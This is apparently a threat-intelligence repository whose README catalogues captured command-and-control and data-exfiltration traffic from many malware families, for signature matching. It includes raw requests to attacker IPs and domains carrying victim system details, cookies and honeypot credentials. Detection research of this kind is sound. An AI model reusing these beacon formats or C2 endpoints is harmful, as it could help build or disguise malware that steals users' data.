Repository: silence-is-best/c2db Branch: master Commit: 6a2b4752fb6e Files: 6 Total size: 214.9 KB Directory structure: gitextract_zx49xygj/ ├── .gitignore ├── README.md └── pcaps/ ├── .gitkeep ├── acbackdoor.pcap ├── acbackdoor.txt └── backstage.pcap ================================================ FILE CONTENTS ================================================ ================================================ FILE: .gitignore ================================================ .DS_Store ================================================ FILE: README.md ================================================ ### A repo for matching on known c2 and exfil traffic keywords (ctrl+f to search) #### ACBackdoor Hash: 907e1dfde652b17338d307b6a13a5af7a8f6ced93a7a71f7f65d40123b93f2b8 Pcap: (https://github.com/silence-is-best/c2db/blob/master/pcaps/acbackdoor.pcap) and sslkeyfile: (https://github.com/silence-is-best/c2db/blob/master/pcaps/acbackdoor.txt) ~~~ POST / HTTP/1.1 Host: 193.29.15.147 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Accept: */* Access-Control: aW5mbw== X-Access: c22ed12456e9eb9844eafe80f3d8c080 Content-Length: 48 Content-Type: application/x-www-form-urlencoded NTI6NTQ6MDA6NEE6QUQ6MjEKV2luZG93cwp4ODZfNjQKMC41 HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Date: Mon, 11 Nov 2019 13:55:27 GMT Content-Length: 0 ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/acbackdoor.png "ACBackdoor") #### AgentTesla ftp: ~~~ Time: 11/25/2019 17:48:57
User Name: admin
Computer Name: USER-PC
OSFullName: Microsoft Windows 7 Professional
CPU: Intel(R) Core(TM) i5-6400 CPU @ 2.70GHz
RAM: 4095.61 MB
URL:https://www.facebook.com/
Username:honey@pot.com
Password:honeypass356
Application:Chrome
URL:192.168.1.1
Username:honey@pot.com
Password:honeypass356
Application:Outlook
~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/agentteslaftp.png "AgentTesla FTP") http: ~~~ POST /zin/WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: megaplast.co.rs Content-Length: 308 Expect: 100-continue Connection: Keep-Alive HTTP/1.1 100 Continue p=G1DZYwdIiDZ6V83seaZCmTT0wiCyOlXVS0OEx4YpkUAOuKO/6hfQJ%2BZD2LjpTbyu9w0gudjYXCIc0Ul74wtsvtqYLYuTR%2BlFVl%2B5deG0RnTTo6nFc1M9tx0%2BRo7WXetRdIHkmVMMSeqH%2BEroM7yttDzosvKfKgB%2BJ07oqT/YvQ6CPNW2%2BCETCU6oIlO9XYyrEy6/hYeF%2BgkfRc9xSEfZhh/7Wk0khJ4zZJ3cjEvXDxJcQWA739/yDUy4kOAndihYsWnLw1mVCHxJSJf7%2BguB9f4DpgX10NLpH ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/agenttesla-http.png "AgentTesla HTTP") smtp exil: ~~~ From: office@larbaxpo[.]com To: officelogs@larbaxpo[.]com Date: 9 Oct 2019 17:58:19 +0100 Subject: admin/USER-PC Recovered Cookies Content-Type: multipart/mixed; boundary=--boundary_0_cac7ba32-e0f8-42d4-8b2e-71d1828e6ff7 ----boundary_0_cac7ba32-e0f8-42d4-8b2e-71d1828e6ff7 Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: quoted-printable Time: 10/09/2019 17:58:13
UserName: admin
ComputerName: USE= R-PC
OSFullName: Microsoft Windows 7 Professional
CPU: Int= el(R) Core(TM) i5-6400 CPU @ 2.70GHz
RAM: 3583.61 MB
IP: 18= 5.183.107.236=0A
~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/agenttesla-submission.png "AgentTesla Submission") #### Amadey ~~~ POST /madapam/index.php HTTP/1.1 Host: bolsaooma.com Accept: */* Content-Type: application/x-www-form-urlencoded Content-Length: 77 id=6289217249&sd=MMMMMM&vs=1.43&ar=0&bi=0&lv=0&os=9&av=0&pc=USER-PC&un=admin& HTTP/1.1 200 OK Server: nginx Date: Wed, 09 Oct 2019 06:20:09 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 6 Connection: close ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/amadey.png "Amadey") #### Arechclient2 ~~~ ....+.{"Type":"EncryptionStatus","Status":"Off"}....&.{"Type":"ConnectionType","ConnectionType":"Client","SessionID":"191003337","BotName":"admin","BotOS":"Microsoft Windows 7 Professional "}....-.{"Type":"SessionID","SessionID":"191003337"}......{"Type":"AfkSystem"}....).{"Type":"ServerAfkSystem","Status":"ok"} ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/arechclient2.png "Arechclient2") #### Artraloader ~~~ POST /kvs06v.php HTTP/1.0 Host: onlinejohnline99.org Connection: keep-alive Content-type: application/x-www-form-urlencoded Content-length: 97 SNI=VTFS.QD&UME=Xjoepxt!8!Qspgfttjpobm&OPQ=benjo&IVR=VTFS.QD$$benjoAA11482.572.3314613.96675&st=0 HTTP/1.0 200 OK Content-Type: text/html Content-Length: 0 Date: Mon, 26 Aug 2019 21:33:28 GMT Server: LiteSpeed Connection: close POST /Engset.php HTTP/1.0 Host: hewle.kielsoservice.net Connection: keep-alive Content-type: application/x-www-form-urlencoded Content-length: 126 BCDEF=EFTLUPQ.KHMMKME&MNOPQ=Xjoepxt!21!Qsp&GHIJ=benjo&UVWXYZ=EFTLUPQ.KHMMKME$$benjoAAcc:37f65.f4db.51ge.bf:1.3875452f88:3&st=0 ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/artra.png "Artraloader") #### Avemaria, aka ave_maria, warzone rat ~~~ 00000000 09 12 3b 42 2d 33 a2 44 fc 01 86 73 ..;B-3.D ...s 00000000 09 12 3b 42 f7 33 a2 44 fd 01 86 73 69 3d ae 12 ..;B.3.D ...si=.. 00000010 bb c6 19 fd 1a 3a f3 11 c9 ae da 3c 30 bc 38 81 .....:.. ...<0.8. 00000020 fc 00 0f ca 4e fb 05 c6 de b7 3c 6f 4e 01 a2 87 ....N... .. 00000060 f1 79 73 5d 9f 1c c4 8e 1a c5 16 20 71 5e 55 06 .ys].... ... q^U. 00000070 21 7b 8d 35 de 00 25 5d 6f d7 f2 ca a3 ea ef 73 !{.5..%] o......s 00000080 90 1f 6e 10 d3 b1 0a 56 17 71 3b 48 bd 5c d9 36 ..n....V .q;H.\.6 00000090 7e b4 f1 76 46 b8 48 ca 45 1e cd 66 90 d5 67 6b ~..vF.H. E..f..gk 000000A0 aa b7 98 ed 9d df 7e 36 c0 78 87 6b 56 03 86 67 ......~6 .x.kV..g 000000B0 1f ed bb 9e e6 78 aa d5 94 e3 0e e2 c0 5e c7 87 .....x.. .....^.. 000000C0 57 60 34 e4 06 ea 10 ae 6e 38 c3 ca af 01 e2 2c W`4..... n8....., 000000D0 ea d4 26 f9 3a 05 83 f7 aa 59 db 01 f5 2b 40 1e ..&.:... .Y...+@. 000000E0 74 28 36 1f ac 03 t(6... 0000000C 09 12 3b 42 2d 33 a2 44 dc 01 86 73 ..;B-3.D ...s 000000E6 09 12 3b 42 29 33 a2 44 eb 01 86 73 bc 8d c4 e7 ..;B)3.D ...s.... 00000018 09 12 3b 42 5d d9 a2 44 e2 01 86 73 bc 8d c4 e7 ..;B]..D ...s.... 00000028 ca 69 41 01 ab 12 30 ff ae 64 2d 93 dc 65 53 9b .iA...0. .d-..eS. ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/avemaria.png "Avemaria") ~~~ con|1597172877123|285|ZTkyNGVhNzkxMjU1N2RlZHxKT05BVEhBTi1QQ1xKb25hdGhhbnwpMiBEdW8gICAgIFQ3NzAwICwgU3RhbmRhcmQgVkdBIEdyYXBoaWNzIEFkYXB0ZXJ8V2luIDcgICh4NjQpfFRXVm5ZVVIxYlhCbGNpQXhMakFnWW5rZ1EyOWtaVU55WVdOclpYSWdMeUJUYmtRPXwwZCAwaCAwbSAwc3w3NjZ8LXwwfDQgR2lCfE4vQXwyMzA0fDE5Mi4xNjguMTAwLjEwMXwxfC0xfERlZmF1bHQ=@ ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/avemaria2.png "Avemaria") ~~~ 00000000 17 69 89 31 17 60 ba b0 02 23 a9 79 .i.1.`.. .#.y 00000000 17 69 89 31 ab 60 ba b0 03 23 a9 79 ba 5d bb 30 .i.1.`.. .#.y.].0 00000010 0f 57 5c a6 38 ca da 21 2a 61 66 45 19 f7 7f c6 .W\.8..! *afE.... 00000020 58 09 d3 89 cd 36 fe 88 43 f9 a3 33 40 f7 84 1c X....6.. C..3@... 00000030 19 47 dd 80 1c f2 e0 a4 8b af b9 f1 f7 25 53 48 .G...... .....%SH 00000040 69 a0 32 da c8 1d 3e 07 38 44 3d 5d d6 e8 79 c8 i.2...>. 8D=]..y. 00000050 aa ff bc d4 11 48 8d 9b b2 6a 8e 7b 9a 9c b7 da .....H.. .j.{.... 00000060 b5 fb d6 74 f1 e3 48 88 db 08 bf bf dd d8 a3 3a ...t..H. .......: 00000070 11 c0 4c 98 8d 0e f7 4f 2a 1d 19 12 25 dd ff 72 ..L....O *...%..r 00000080 69 6e 43 c3 db 76 a1 05 2b 6b ef b6 29 8d 52 88 inC..v.. +k..).R. 00000090 db 6e 9b 5b 77 e0 34 57 33 79 7b 95 72 60 65 cb .n.[w.4W 3y{.r`e. 000000A0 f7 38 3c f0 12 82 d6 1c 71 12 f7 26 e3 1a b9 49 .8<..... q..&...I 000000B0 c8 eb 46 0f 54 cb f0 35 9c 3e 4d 08 7b 9f 4b 72 ..F.T..5 .>M.{.Kr 000000C0 d5 c3 27 da 27 51 47 de ..'.'QG. 0000000C 17 69 89 31 17 60 ba b0 2a 23 a9 79 .i.1.`.. *#.y 00000018 17 69 89 31 5f 60 ba b0 20 23 a9 79 79 fa d3 d9 .i.1_`.. #.yy... 00000028 1d 44 2c 26 8a c9 f5 58 76 a2 3e f6 1c 79 65 06 .D,&...X v.>..ye. 00000038 23 08 a7 89 d7 34 8c 88 36 f9 ca 33 35 f7 aa 1c #....4.. 6..35... 00000048 72 47 b9 80 3f f2 c1 a4 e7 af 97 f1 db 25 31 48 rG..?... .....%1H 00000058 4a a0 14 da ab 1d 4e 07 57 44 7e 5d 42 a2 a0 0b J.....N. WD~]B... 00000068 2d f8 d9 d4 -... ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/avemaria3.png "Avemaria") #### Azorult POST retrieve method, unique pattern with lot's of '/' and ')' ~~~ POST /index.php HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) Host: 51.38.76.57 Content-Length: 103 Cache-Control: no-cache J/.8/.:/.O.(8.I/.>/.9/.>K.>8.N/.I/.;/.:.NL.?N.>8.(9.L/.8/.H.(9.(9.(9.(9.I ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/azorult.png "Azorult") #### Backstage aka Powerkatz Hash: b4e270dce231fd01c326f0828a3c5ad80012ebb932842aa8e420575859406fac Pcap: (https://github.com/silence-is-best/c2db/blob/master/pcaps/backstage.pcap) ~~~ POST /index.php/api/fb HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Content-Length: 933 Host: www.wdsfw34erf93.com data=aHpyTUxwSW1cNTw0ZXFVTV1GTDlMRkxsT0RyTUxwSXZlSUVraFo0b2VxVVFdW1VyZTVVfUxtcmpMbEx2RmpubFw1PHlkNW9vVnFReWVsTDlMRk1lW0o4Z0xJe3hMbHpORlZNcFxxWX1dW016XFtRfUxtcmpMbEx2RmpubF1xTXNdWjhuZjM4NGVWTDlMRkx6TGx6TkZWTXBmcDx3TG1yakxwWTddVkx2RmpubGRKSX1WSjx3XVlFa101WGxSbERsUEZMdkZqbmxkWjh9XDU8eWQ1b29WcVF5ZWxMOUxGTWVbSjhnTEl7eExsek5GVk1zZXFRNGY1WXxmSkl9ZnxMOUxGTGxPRHJNTHBvfVRwM2xSbERsTGx6TkZWTXNmM1FyZnA8d11YWTdkW1EzTG1yakxtSGxPRHJNTHBvfVdKPHFkWjhvXUZMOUxGTHpMbHpORlZNc2Y1b3hmNlVrZUp6bFJsRGxQRkx2RmpubGU1TXRYNm99Vlo4cGV8TDlMS3ZORlRubF1wb3xmNlVMXUpVV11bTXNcWntSZ1o0bF1bTGxSbERsUUpUNFBXUHpQfUR9UEdQelBtRH1QV0x6UG1EfFBHTHpQbUR8UEdMelBtRHxQR0x6UG1EfFBGTHZGam5NTHA0a1w2UGxSbEVlRmpuTUZWTDRQbXI0UUdyelBHcntQfXI3UX1yelFWTGpGam5NW1Z6TkZUbmxmNm99Z0pZd1lwWXxmNW95ZWxMOUxGTVtkWjhuZTZnfVE0UVRQWDx8VTZNb1xbVW9mbEVHZUpvb2VxVGxMRHJNaVZ6TkZWTXpcW29NZXBdeUxtcmpMbEx2RmpubGZwSXhdRkw5TEZMe1F9ajdRfEx2RmpubGdab25MbXJqTG1MelFsTHZGam5sZ3BZfGY1b3llbEw5TEZMNUxsRE5pVkRO HTTP/1.1 200 OK Date: Wed, 23 Sep 2020 12:30:29 GMT Server: Apache Upgrade: h2 Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 aHxNfWdKSTNnW1BsUm1JPA== ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/backstage.png "Backstage") #### Bandook RAT ~~~ 00000000 64 4f 7a 54 30 46 72 56 44 51 4c 30 6f 32 49 48 dOzT0FrV DQL0o2IH 00000010 6f 70 46 6c 31 69 37 48 4c 35 48 48 54 4f 6e 66 opFl1i7H L5HHTOnf 00000020 6f 30 55 72 6a 47 7a 48 30 61 30 4f 62 54 37 69 o0UrjGzH 0a0ObT7i 00000030 45 42 64 2b 54 4e 6a 4f 72 77 74 44 6d 4c 57 52 EBd+TNjO rwtDmLWR 00000040 59 54 68 6f 36 6b 4c 2f 42 38 33 43 4d 75 49 2b YTho6kL/ B83CMuI+ 00000050 6e 34 46 5a 55 66 49 4a 2f 70 6e 31 32 6a 62 73 n4FZUfIJ /pn12jbs 00000060 4c 2f 4c 79 54 73 42 73 76 63 48 66 6e 6b 4a 53 L/LyTsBs vcHfnkJS 00000070 5a 6a 6b 4b 59 34 2b 54 4b 48 44 76 6c 54 32 52 ZjkKY4+T KHDvlT2R 00000080 59 57 69 59 4a 70 54 48 6d 70 68 4f 70 51 4d 47 YWiYJpTH mphOpQMG 00000090 6d 77 3d 3d 26 26 26 mw==&&& 00000000 64 4f 7a 54 30 46 6f 3d dOzT0Fo= 00000097 64 4f 7a 54 30 46 76 56 44 51 3d 3d 26 26 26 dOzT0FvV DQ==&&& ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/bandook.png "Bandook") #### Bazaloader/Bazabackdoor ~~~ GET /pool/job/priority/normal HTTP/1.1 Cookie: HSID=u4EATrsU%2BccZ%2F317LbjgmA6QPLukoI06IX0jiIvsbHOtjThVcMc92Dn08M2eDuWDH3MXcwNO6x4HFg0uhoT3p5tzHh28ab1XyEHdCk4GpfRVj4fFDrtCYi0Z7sk59slweik4TdcpZ4MQqVDfR7i8JaXDN3lfmAVyp9wV34FGGWkgTSFVeGGwKIGhd%2BLkkCWtoMEDoB1YCQHNbEGIlQRAcdKu1uPCDJzOnFivkkiS71IUUX2LacOB1rJ4404HcKP8NmivQ10vy9KBA6uURsQt77zwUX5aicItO3YXJ6HD67TIVa5jhVBlYi1YMJ35SVCbxrFOudvjK23gUjwPFswweQ%3D%3D;SIDCC=t1vgfZ5T9hmjM2bXEHqETxQJ%2FD6%2FO8Ni273vVwk0WctwmufD6uy%2FovmzIi349CWnTEkov0mEC8GyV5nN4fVxwHY1uHsACM5Kc4tfTzwuwN1%2F0h5aMXEBX1whQXEkw4YqIYuRI8KVICQyLmDi%2BjFQoZwzvRbyJpaoHrCalnA1ezNYvJwlt3XbytQL%2BJOR3%2FJ%2FzCfBIxzBTN7%2BwE04D03ROPBs3B8IE53QrE5%2BMQP8Jv6kI74o8%2BsJS5W29bMn01WV49OAdfMlzMKZquOoBC4zvSuaZU5tpNkPwPJJLeUaXEnuAyNSxj7uDJNdM0jkIb%2FhokOijY77%2FRe2YjrfjaofeQ%3D%3D;SID=uSFINuTAOqFt2EPgZrdxIDpmVT0LFTCzEnYCzNVuvjeHwTBqJoL7hyueBhvQPeiMI6Nmu4bXbTrdBfx6xK49K%2BmDMRaftQ%2BPJXDoiVMrab3IPnD9SEffK9OONpXj8FfDX%2FRFrzgLPd0XtGuT9L0jMQSoV4ztrGpcqZ54K1E4Sg28YfuvG31rUZvgtlktnMEh%2FvxkOrPX3z%2Fx1EwTmXLaumiweiKkhAT4ZBrqgG5bf%2FGP%2Bof9hoY8te34a4Zfs9gJxzq0ZqO9KRQf66al%2BGKGIPzcR2hIhPjG1JfqTAYb5OYxVSgMCDViAV3lSuR0vou0KAvsbk650gwGQPLSJWJHVw%3D%3D;SSID=39cuio0XzqpWy0DLG4NZ9X1ZMTAf29t378zdWUbCKP81IPRp4HMFojBN6OZn%2B1sSaPpNWiCiX6GUC5dwNwGhOIs1RUN0eLQYmLADWX290GSSm62UmtD5WrV85WV5iOLJEsXiYIbNdYKQ%2BHpZHDzSfY5%2BzCsghZYIi3FCR96tUt9gJxGB4jEMSUzhtNDCEQyvx4H906IG2s7dmA8WbJA%2B0nZ9rCH6u5%2FpQfwM9DFxiELNl4wvEGGz1L%2BBtRrYKkPfULuPKjACSkdo86GJuCbgxVDVBlboB3F7fyvJt2OwwMeK77hYqhgryk3K%2BJnRQgDntdgR4H8MMSBgI9vVnaFvYA%3D%3D; X-Tag: gz7XdHGoT%2FJKHRjpIamqqoB1AGoy3qdIedXMY5OWHeizgooQ%2BXMI1BHsqRgAobELwQbdqjEONQBZSbXe2hni0t4YDbKmvjrX3%2BRBiPD3u6kO6UWdSRmXR17Ixb6yU3qT3LoJBGcU%2FQA9pwudVzaAVyQA3BkziY6qLdqeo4ZFaNBYTubbPZZhiOELF6UdCa22VYyzIYBSC0pxN8l4itAKsrQL%2FVjxKAXj1SDOyK4DLFgNae%2Fqs0MvckMO2xUEVucj8cI2UMRTJ73ZFJ05REyx%2ByOX83q6qu%2FrV4DM1IxuQDw8h4CMb56EZgY4yeDIrumVGz7LqX1jxb38KADWnBUbfw%3D%3D X-Csrf-Token: rykCu%2BVHJ2bEINA3xxHcfV2w7cRN6ZUaQJWyTdqK0CUQU0rXSZNMUG7Z5ve5o14t0lrePa4eYZVcAtpMlDJpIOMCa3Lk2qaleYNHaQM8%2F41wtLEo5SozmFoUeqRi9f%2BXnWxYr3vzdx3XpRGqkCWXTKuyIE%2BSwDyX7yvuxXjHWaf4qak%2FQ6Uz4NMcDnMwFiKwxLkIk2X%2FK16znremUZ0qP0HaoWjl3%2F5k7zVDBWuU%2FZahGvms4QQxkpAdKT5yFQT9OYz8M52hGRAAWR%2FEDy8hqLK2b2po3YfP3YF%2FM2yNi4uLq%2FP%2BDKEA9i0nEKKe%2BrLf%2BpUjpZ%2Fl5jbeolIOH0bZNg%3D%3D X-Request-ID: k54ZVOB5jq2e2LHM6gvpHzLleRRD68OXJsJFZLG4cOG5hjWDtf2BIk%2BKrd2RlZDnrcYBjLAGGchBQl9G4CNZFDi4dizDjbTHTo6acwxaJHSuq54M6aL4YpIzkziT4F%2FSAcrnqoxwF5Vy%2BBurRUzVpIIArTbpcN7WSO%2BANlBUayw7nW6MUZ0PtCHQXxlTgt5qGcBqn9IlsFeQtwyRa1TgA2FXTYVWJHm923yDurCV0CmkI0qTI2GujJWG5OcAZqqhwGHmCmxZDMONv248RGjGSHeDibSGbGDxah6rRqKqg4vx9YDFR92dx7iEyWeQhSMkHQnc0JV%2FC0thtgmkjj68Sg%3D%3D Host: 195.123.211.5 HTTP/1.1 200 OK Server: nginx/1.10.3 Content-Type: application/json; charset=UTF-8 Content-Length: 2 Connection: keep-alive Date: Thu, 24 Jun 2021 19:26:18 GMT Set-Cookie: DV=5ssdw9_D40TpEC3m Set-Cookie: fr=312725 Set-Cookie: NID=Ca2zDxRCiyvVM6sKhctvLJ2Vrys8Ld2uuXrfUhxg5JW00EZxGAyJooDyiky8504Oh_hZSHzfzOYLt_JEjY0VvGN-jnKRWLL-EZxdCPhDH937LrOkqwduARCJFTf4Onb49DNYiV5EYKD2cXAOhZl8hukrtGjHqtPrQD6en3BFOpws4X4pFBXz53RPD8lmRLcmLXWws3qrKoyJo8A_eFuUABvqvA7eJTJZ7dZO3NIRC1oZixRhdNytbVzI1PFJOQBY Set-Cookie: datr=b4n4l%2BdMcUiAk3BgfGSx3CvY5IBMiR%2Fz0LdmGzvzAULKDgDHLpUbf6eH8AAwBG5q5IjuegyO0LPkEZRCqmiPKM9OvVT9eBEiG7RX9Yn%2FN1v43Km09B9fvjxOau6QEfOUzPjazm%2FdRhkTTEA4Q28oe8neeqRwVpH7PTRp0%2BzWPNxjv1uNhfPls1Iq%2B97zGmNxeKcGvE3mFaQPuuMif%2FzN5Hltrm56QnnfyEJ6PDvC8FdJS%2B4Tdasn3VpV1CXKXYvcFvb5kVkQnuqvXF3a6hlx1BZXQQsK8Ls3p6Q0lZO1VgnstYpKccmW7QEekMs5USUUyE2ZDZOyunRod%2Bmci5ePzQ%3D%3D Set-Cookie: SID=433278 Set-Cookie: HSID=750848 Set-Cookie: SNID=FwxJ05MkOfvPjHLjx6_ECANXTqnfF4KazSvYfbsQxuDqwnRw3sQ6-ziG9cSOdz4PyizA1Q6eTWM7xRHA3NOE7Lcl8F7ulbBRjRdUtZc5WDn0_DSHjyYIReH0O0bJOtVgLaRhNa6lrQqJPl36FUfacLEbEQ5qX7X8tXf4t216rGOxVdPI075mn6YSPT_boPA2CMcGphwO6Voz1telbeiu__Y7weWCii9xW_YtYdCK5P8PNMhN7fZvvkmTKcP0e-aw Set-Cookie: CGIC=cdXhUoYzwvog7mCeJBtGk9ntKIXXtJNmxhbrvLXvvKW2T_v7LPVGISh_UA Set-Cookie: SSID=false Set-Cookie: stamp=192153 Vary: Accept OK ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/baza.png "Bazaloader") #### Betabot ~~~ POST /forum3/logout.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: russk9.icu Content-Length: 664 Cache-Control: no-cache bcjkr=386731&dgpsben=2019162b8cf358952f71fa238d6ecbcd6c424d692427445f&fkvalqbgr=C27431FCDE2C51BA6EA493FEAB76CE9BE2812C592CBADEEC4495BC94DDE1882E969102B5A9939B43816D8DA17AC2C05A575A4FC03B11D0C9614BE38ABB6B7F57984A1EC6D101BF290C06DC4C3093B6B165ACAEF8C9EFE3099C11D2106C16EFFD27888EB24A03E0CDE4935AAB53FD212683FF45CAE1BF47F2C343D602E10C79E49B74E6FE10469501A63C762A089446AC9A1C5A802C80071E11058065B5C481D0DB2E6B0AC9A7461DE3DA4792CC86A6E072080ACCB527BB0D97D7C91874B8754068C71AD56502B1A03279A280EF9E705E25193C82A93B220B4B1A63FD8B93EF2B528AF5EB5A00E4234CF1744FA96A05937E7B41D4B82B3997203F0ABCBFC2C49245E56DED2DF1941DA739C6F9C7C3E30C93A136705F3574F34C74E6DE2AD09C9BFA616F4C HTTP/1.1 200 OK Server: nginx/1.16.1 Date: Mon, 28 Oct 2019 23:47:58 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/5.5.38 ..._...+...<.f........}..........?...yg.4.....#.Q...p...1yy.u..N?.ueg.v....EO......K.:....R.]......zv...3@j.. ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/betabot.png "Betabot") #### BitRAT Hash: 9e11c859c27b3696188e8b9ad95513dcc0a61980232dc4bf455df5d6f4454e46 ~~~ con|1601670957699|281|MTE0NGRlZjhiNzc4ODM5ZXxKT05BVEhBTi1QQ1xKb25hdGhhbnwpMiBEdW8gICAgIFQ3NzAwICwgU3RhbmRhcmQgVkdBIEdyYXBoaWNzIEFkYXB0ZXJ8V2luIDcgICh4NjQpfFFXUnRhVzVwYzNSeVlYUnZjam9nUTI5dGJXRnVaQ0JRY205dGNIUT18MGQgMGggMG0gMHN8MTEwfC18MHw0IEdpQnxOL0F8MjUxNnwxOTIuMTY4LjEwMC4xMDF8MXwtMXxEZWZhdWx0fDEuMzA=@ ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/bitrat.png "Betabot") #### Bitter RAT (Patchwork) ~~~ GET /ourtyaz/qwe.php?TIe=%3a116%3ad48.2431.52b5.c69e.3c86b%3a961e3g*Vtfs.QD*%3aACme%3b%217%2f2%2f8712%21Tfswjdf%21Qbdl%212 HTTP/1.1 Host: frameworksupport.net Connection: close HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Content-Length: 74 Date: Sat, 12 Jan 2019 02:44:27 GMT Accept-Ranges: bytes Server: LiteSpeed Connection: close 90059c37-1320-41a4-b58d-2b75a9850d2f 78.109.23.2 User-PC EXE: ## SIZE: ## AXE: ## SIZE: #45#SRE: ## ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/bitter.png "Bitter RAT") #### Bladabindi aka nJrat ~~~ 147.ll1990MURFTUFZT19DNEJBMzY0Nw==1990USER-PC1990admin199018-03-2619901990Win 7 Professional SP1 x861990No1990N/A1990..1990UHJvZ3JhbSBNYW5hZ2VyAA==1990123.inf1990MURFTUFZTw0KMWRlbWF5by5kdWNrZG5zLm9yZzoxOTkwDQp2NC4wLjMwMzE5DQpSZWdTdmNzLmV4ZQ0KRmFsc2UNCkZhbHNlDQpGYWxzZQ0KRmFsc2U=15.CAP199035199023926.CAP1990......JFIF.....`.`.....C........... . ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/njrat.png "Bladabindi - nJrat") #### Blacknet ~~~ GET /black/BlackNETPanel/receive.php?command=UGluZw==&vicID=SGFjS2VkX0M0QkEzNjQ3 HTTP/1.1 Host: meublesinde.in HTTP/1.1 200 OK Date: Fri, 17 Jan 2020 19:49:47 GMT Server: Apache X-Powered-By: PHP/7.1.33 Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/blacknet.png "Blacknet") #### Blackrat aka blackremote ~~~ 9.............................>Clientx, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null......ProClient.Data.....data.bytes.............102622021F20414A5644044411072A755821285E472B1826013113651A28101927225D5B1037185F69394B2911291A1A3F031C113F696C1442754978280A031673281879480C2843582C0B032E41737D7E5B5C7A0F7C0D7521 ...............................>Clientx, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null......ProClient.Data.....data.bytes..........."1A3A0F03142D5055131F585605383F4051 ...............................J2085182040988060201, Version=1.0.7.0, Culture=neutral, PublicKeyToken=null..... BlackRAT.Data.....data.bytes...........(102622021F20415F0818765B27312642512C3103 ...............................J2085182040988060201, Version=1.0.7.0, Culture=neutral, PublicKeyToken=null..... BlackRAT.Data.....data.bytes............123C3803363F73570B0552 ..$............................J2085182040988060201, Version=1.0.7.0, Culture=neutral, PublicKeyToken=null..... BlackRAT.Data.....data.bytes.............16310D190E2C4918020E52 ..........$...MZ......................@............................................. .!..L.!This program cannot be run in DOS mode. ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/blackrat.png "Blackrat") #### Borr ~~~ HTTP/1.1 100 Continue POST /Auth/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 92.63.197.188 Content-Length: 203 Expect: 100-continue Connection: Keep-Alive type=login&username=n3L9rdjJe47G%2bCRzL%2fTwmQ%3d%3d&password=n3L9rdjJe47G%2bCRzL%2fTwmQ%3d%3d&hwid=lsd&session_id=ejQ5U3JwREpZV0k4d21DTU85WHdlTXVTN2lEQ2hkMzI%3d&session_salt=ejQ5U3JwREpZV0k4d21DTQ%3d%3d HTTP/1.1 200 OK Date: Thu, 30 Jan 2020 01:53:02 GMT Server: Apache/2.4.18 (Ubuntu) Content-Length: 24 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 ZZRTKdEbowHH5njhG6UW5w== GET /gate.php HTTP/1.1 Host: 5.188.60.21 Connection: Keep-Alive HTTP/1.1 200 OK Date: Thu, 30 Jan 2020 01:53:02 GMT Server: Apache/2.4.18 (Ubuntu) Content-Length: 56 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 1,1,1,1,1,1,1,2,1,txt;cs;mp3;,https://url.com/file.exeHTTP/1.1 200 OK Date: Thu, 30 Jan 2020 01:53:02 GMT Server: Apache/2.4.18 (Ubuntu) Content-Length: 56 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 1,1,1,1,1,1,1,2,1,txt;cs;mp3;,https://url.com/file.exeHTTP/1.1 100 Continue POST /gate.php?id=1&os=Windows%207&cookie=10&pswd=3&version=v1.0%20Beta&cc=0&autofill=2&hwid=90059C37132041A4B58D2B75A9850D2F HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------8d7a52725dea892 Host: 5.188.60.21 Content-Length: 60824 Expect: 100-continue -----------------------8d7a52725dea892 